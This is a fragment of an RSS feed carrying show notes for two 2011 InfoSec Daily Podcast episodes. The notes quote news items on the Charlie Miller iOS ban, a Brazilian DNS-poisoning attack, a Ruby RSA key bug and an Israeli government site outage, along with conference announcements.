<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The rumblings of a defection &mdash; a potentially serious blow to one of Washington&rsquo;s most powerful lobbies &mdash; come weeks after Yahoo left the Chamber in October, largely over its support of Sen. Patrick Leahy&rsquo;s (D-Vt.) online piracy bill, the PROTECT IP Act.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://sectools.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://sectools.org/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For more than a decade, the Nmap Project has been cataloguing the network security community&#39;s favorite tools. In 2011 this site became much more dynamic, offering ratings, reviews, searching, sorting, and a new tool suggestion form. This site allows open source and commercial tools on any platform, except those tools that we maintain (such as the Nmap Security Scanner, Ncat network connector, and Nping packet manipulator).</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;re very impressed by the collective smarts of the security community and we highly recommend reading the whole list and investigating any tools you are unfamiliar with. Click any tool name for more details on that particular application, including the chance to read (and write) reviews. Many site elements are explained by tool tips if you hover your mouse over them. Enjoy!</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.usajobs.gov/GetJob/PrintPreview/301181700"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.usajobs.gov/GetJob/PrintPreview/301181700</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This position is located in the Department of Homeland Security (DHS), Office of the Chief Information Officer, &nbsp;Information Security Office (ISO), and directs the information security requirements of the Department by ensuring the confidentiality, integrity, and availability of systems, networks, and data through the planning, analysis, development, implementation, maintenance, and enhancement of information security programs, policies, procedures, and tools. &nbsp;The Director is responsible for performing and supervising work that involves applying analytical processes to the planning, design, and implementation of new and improved information systems to meet the business requirements of the agency&#39;s line of business and administrative programs. &nbsp;Executes the planning and delivery of secure, high-quality enterprise application services for DHS customers. &nbsp;Provides the security architectural planning and delivery of enterprise Information Technology (IT) services across DHS.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.cultofmac.com/128577/apple-kicks-security-researcher-out-of-app-store-and-developer-program-after-ios-vulnerability-demonstration/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.cultofmac.com/128577/apple-kicks-security-researcher-out-of-app-store-and-developer-program-after-ios-vulnerability-demonstration/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We told you a couple of hours ago about security guru Charlie Miller&rsquo;s new iOS vulnerability that allows an approved App Store app to run unsigned code remotely. Miller has been hacking Apple&rsquo;s products for years, and this most recent bug is a particularly nefarious exploit that could be used for all kinds of evil purposes.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Charlie Miller is one of the good guys, however, and he is planning to show his cards at the SysCan conference in Taiwan next week. The ends don&rsquo;t always justify the means in this case, as Apple has now kicked Miller out of the App Store and iOS Developer Program.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a series of tweets, Miller announced Apple&rsquo;s swift decision to ban him from the iOS world. Miller demoed his hack via a sleeper app, called Instastock, that he submitted to the App Store. In a video, he demonstrated running unsigned code from his home server on the Apple-approved app.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The bug involves exploiting javascript code in iOS that Apple didn&rsquo;t secure enough in the latest release of the operating system. Apple touts iOS as being more stable than its competition, like Android, and this bug that Miller discovered poses a dangerous threat to Apple&rsquo;s spotless App Store ecosystem.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Now you could have a program in the App Store like Angry Birds that can run new code on your phone that Apple never had a chance to check,&rdquo; says Miller. &ldquo;With this bug, you can&rsquo;t be assured of anything you download from the App Store behaving nicely.&rdquo;</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since posting the video outlining his hack earlier today, Apple has banned Miller from both the App Store and Developer Program. On his Twitter account, Miller complained that, &ldquo;First they give researcher&rsquo;s access to developer programs, (although I paid for mine) then they kick them out.. for doing research.&rdquo;</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As a respected security researcher with a track record of exploiting Apple&rsquo;s products, one could argue that Miller could have reported the exploit to Apple directly instead of planting a malicious app in the App Store. On the other side of the coin, it&rsquo;s telling that Miller got his app through Apple&rsquo;s review team in the first place.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What do you think? Was Apple justified in removing Miller from the App Store entirely (instead of pulling the Instastock app specifically) and kicking him out of the iOS Developer Program?</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Charlie&rsquo;s comment on Twitter: </span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;For the record, without a real app in the AppStore, people would say Apple wouldn&#39;t approve an app that took advantage of this flaw.&rdquo;</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="https://developer.apple.com/news/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://developer.apple.com/news/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vast majority of Mac users have been free from malware and we&#39;re working on technologies to help keep it that way. As of March 1, 2012 all apps submitted to the Mac App Store must implement sandboxing. Sandboxing your app is a great way to protect systems and users by limiting the resources apps can access and making it more difficult for malicious software to compromise users&#39; systems. Learn more by visiting the</span><a href="https://developer.apple.com/devcenter/mac/app-sandbox/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">App Sandbox page</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://paranoia.dubfire.net/2011/11/two-honest-google-employees-our.html"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://paranoia.dubfire.net/2011/11/two-honest-google-employees-our.html</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[I]t&#39;s very difficult to monetize data when you cannot see it. And so if the files that I store in Google docs are encrypted or if the files I store on Amazon&#39;s drives are encrypted then they are not able to monetize it&#8230;.And unfortunately, these companies are putting their desire to monetize your data over their desire to protect your communications.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, this doesn&#39;t mean that Google and Microsoft and Yahoo! are evil. They are not going out of their way to help law enforcement. It&#39;s just that their business model is in conflict with your privacy. And given two choices, one of which is protecting you from the government and the other which is making money, they are going to go with making money because, of course, they are public corporations. They are required to make money and return it to their shareholders.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-517-lob-the-lobbyists-top-125-fallguy-for-hire-goodbye-charlie-sandbox-or-gtfo-privacy-is-not-profitable/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3097/0/infosec-daily-podcast-episode-517.mp3" length="14397584" type="audio/mpeg" />
		<itunes:duration>0:29:57</itunes:duration>
		<itunes:subtitle>&#160;InfoSec Daily Podcast Episode 517 for November 8, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan (aka Shit Eye), Themson Mester, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his st[...]</itunes:subtitle>
		<itunes:summary>&#160;InfoSec Daily Podcast Episode 517 for November 8, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan (aka Shit Eye), Themson Mester, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source:http://www.politico.com/news/stories/1111/67603.html
	Google is considering ditching the U.S. Chamber of Commerce out of frustration with its support for legislation that would force Internet companies to police websites that peddle pirated movies and fake Viagra.
	The rumblings of a defection &#8212; a potentially serious blow to one of Washington&#8217;s most powerful lobbies &#8212; come weeks after Yahoo left the Chamber in October, largely over its support of Sen. Patrick Leahy&#8217;s (D-Vt.) online piracy bill, the PROTECT IP Act.
	&#8230;
	Source: http://sectools.org/
	For more than a decade, the Nmap Project has been cataloguing the network security community&#39;s favorite tools. In 2011 this site became much more dynamic, offering ratings, reviews, searching, sorting, and a new tool suggestion form. This site allows open source and commercial tools on any platform, except those tools that we maintain (such as the Nmap Security Scanner, Ncat network connector, and Nping packet manipulator).
	We&#39;re very impressed by the collective smarts of the security community and we highly recommend reading the whole list and investigating any tools you are unfamiliar with. Click any tool name for more details on that particular application, including the chance to read (and write) reviews. Many site elements are explained by tool tips if you hover your mouse over them. Enjoy!
	Source: http://www.usajobs.gov/GetJob/PrintPreview/301181700
	This position is located in the Department of Homeland Security (DHS), Office of the Chief Information Officer, &#160;Information Security Office (ISO), and directs the information security requirements of the Department by ensuring the confidentiality, integrity, and availability of systems, networks, and data through the planning, analysis, development, implementation, maintenance, and enhancement of information security programs, policies, procedures, and tools. &#160;The Director is responsible for performing and supervising work that involves applying analytical processes to the planning, design, and implementation of new and improved information systems to meet the business requirements of the agency&#39;s line of business and administrative programs. &#160;Executes the planning and delivery of secure, high-quality enterprise application services for DHS customers. &#160;Provides the security architectural planning and delivery of enterprise Information Technology (IT) services across DHS.
	Source:www.cultofmac.c[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 516 &#8211;  DNS Poisoning, e == 1, &#8220;Server Glitch&#8221;, L3, Nice Pack, &amp; S.N.A.P</title>
		<link>http://www.isdpodcast.com/episode-516-dns-poisoning-e-1-server-glitch-l3-nice-pack-s-n-a-p</link>
		<comments>http://www.isdpodcast.com/episode-516-dns-poisoning-e-1-server-glitch-l3-nice-pack-s-n-a-p#comments</comments>
		<pubDate>Tue, 08 Nov 2011 01:52:19 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3089</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 516 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Varun Sharma. Announcements: Brad Smith theNurse and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 516 for November 10, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith theNurse and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.thetechherald.com/article.php/201145/7815/Insider-arrested-after-DNS-poisoning-attack-targets-Brazilian-ISPs"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thetechherald.com/article.php/201145/7815/Insider-arrested-after-DNS-poisoning-attack-targets-Brazilian-ISPs</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A 27-year-old employee of a medium-sized ISP in the southern part of Brazil has been arrested, after a DNS cache poisoning attack spread across the country and pointed millions of users to a Trojan aimed at capturing banking and other credentials.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, millions of Brazilians had their internet connections hijacked, prompting them to install malicious software, after visiting popular destinations such as Hotmail, GMail, YouTube, and local portals Uol, Terra, and Globo.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky&rsquo;s Fabio Assolini reported on the attacks, and noted that users were being told to install a banking Trojan, disguised as a security program called Google Defense.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Last week Brazil&rsquo;s web forums were alive with desperate cries for help from users who faced malicious redirections when trying to access websites such as YouTube, Gmail and Hotmail, as well as local market leaders including Uol, Terra and Globo,&rdquo; he said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;[Redirected users were asked] to download and install the so-called &ldquo;Google Defence&rdquo; software required to use the search engine. In reality, though, this file is a Trojan banker detected by Kaspersky&rsquo;s heuristic engine. Research into this IP highlighted several malicious files and exploits hosted there.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As mentioned, Brazil&rsquo;s Federal Police arrested an employee of a medium-sized ISP in the southern part of the country. It&rsquo;s understood that for about ten months, he used his access to alter his employer&rsquo;s DNS cache, which in turn forced its customers to the malicious server handing out the banking malware.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky suspects that similar internal compromises are happening across Brazil.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In related news, businesses across the country were reporting that their networking equipment, such as modems and routers, were remotely compromised and had their DNS settings changed in order to join the attack.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Corporate users were redirected to the malicious server and told to install a Java applet, which in fact was another variant of the banking Trojan.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&amp;revision=33633"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&amp;revision=33633</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you are running Ruby for any reason at all (Metasploit perhaps?), it&rsquo;s time to pull down the latest revision. &nbsp;There&rsquo;s a nasty bug in the encryption that was introduced back in September 2011. &nbsp;If you are running 1.9.3 or earlier, you are probably safe.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* ext/openssl/ossl_pkey_rsa.c (rsa_generate): [SECURITY] Set RSA<br class="kix-line-break" /><br />
	&nbsp;exponent value correctly. &nbsp;Awful bug. &nbsp;This bug caused exponent of<br class="kix-line-break" /><br />
	&nbsp;generated key to be always &#39;1&#39;. &nbsp;By default, and regardless of e<br class="kix-line-break" /><br />
	&nbsp;given as a parameter.<br class="kix-line-break" /><br />
	&nbsp;&nbsp;&nbsp;<br class="kix-line-break" /><br />
	&nbsp;!!! Keys generated by this code (trunk after 2011-09-01) must be <br class="kix-line-break" /><br />
	&nbsp;re-generated !!! (ruby_1_9_3 is safe)<br class="kix-line-break" /><br />
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br class="kix-line-break" /><br />
	* test/openssl/test_pkey_rsa.rb: Add tests for default exponent and<br class="kix-line-break" /><br />
	&nbsp;specifying exponent by a parameter.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9221549/Israel_says_server_glitch_took_government_sites_offline"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9221549/Israel_says_server_glitch_took_government_sites_offline</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Israeli government websites were up and running again Monday, after what the government described as a &quot;server glitch&quot; at a server farm took several of them offline.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Websites including those of the Mossad intelligence service, Israel Defense Forces (IDF), and the Israeli Security Agency known as Shabak or Shin Bet were either inaccessible or under maintenance late Sunday, raising the suspicion that the outage was the handiwork of the hacker group Anonymous.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Friday, Anonymous threatened to attack Israel if it continued its blockade of the Gaza Strip. However, Anonymous hasn&#39;t claimed credit for an attack.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Israeli government has meanwhile said repeatedly that its websites have not been hacked.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;All of the Israeli government websites which were down yesterday are now back up. Once again &#8211; it wasn&#39;t a cyber attack but a server glitch,&quot; said Ofir Gendelman, a spokesman in the Israel Prime Minister&#39;s Office, in a Twitter message on Monday.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The problem was in the government&#39;s server farm, called &quot;Tehila&quot;, which is operated by the Ministry of Finance, Gendelman said in an email.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There was a glitch in one of the servers that carry websites of a few ministries and government agencies, including the IDF spokesperson&#39;s website,&quot; he wrote.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Gendelman did not provide the details of the server glitch, though according to Israeli newspaper reports there was a malfunction in a storage component. The websites of the Prime Minister&#39;s office and Ministry of Foreign Affairs did not crash, which is another proof that it wasn&#39;t a cyber attack, he said.</span></p>
